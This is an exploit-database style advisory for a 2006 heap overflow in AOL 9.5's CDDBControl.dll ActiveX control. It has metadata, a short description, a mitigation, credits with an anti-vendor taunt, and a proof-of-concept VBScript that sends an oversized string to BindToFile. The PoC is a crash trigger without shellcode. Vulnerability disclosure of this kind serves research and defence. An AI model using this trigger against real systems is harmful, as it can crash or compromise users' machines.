ActiveX - Heap Overflow - exploit.company

vendor:

AOL 9.5

by:

Celil 'karak0rsan' Unuver and murderkey

9,3

CVSS

HIGH

Heap Overflow

119

CWE

Product Name: AOL 9.5

Affected Version From: AOL 9.5

Affected Version To: AOL 9.5

Patch Exists: YES

Related CWE: CVE-2006-4010

CPE: 2.3:aol:aol_9.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

ActiveX – Heap Overflow

Vulnerability is in Activex Control ("CDDBControl.dll") Sending a string to BindToFile() , triggering the vulnerability. Successful exploitation allow remote attackers to execute arbitrary code.

Mitigation:

Disable ActiveX controls in the browser.

Source

Exploit-DB raw data:

Product:

AOL 9.5

Vulnerability:

ActiveX - Heap Overflow

Discussion:

Vulnerability is in Activex Control ("CDDBControl.dll") 
Sending a string to BindToFile() , triggering the vulnerability.
Successful exploitation allow remote attackers to execute arbitrary code.

Credits:

Celil 'karak0rsan' Unuver and murderkey
from Hellcode Research

tcc.hellcode.net
forum.hellcode.net


L4stW0rdZ: "hi francis, do you think we forget you ??? ofcourse not, dont wait patch, dont support vendors
and security industry ...." - mkey

---------------
PoC .wsf script:

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />

<script language='vbscript'>


arg1=String(4000, "A")
arg2=1

target.BindToFile arg1 ,arg2 

</script>
</job>
</package>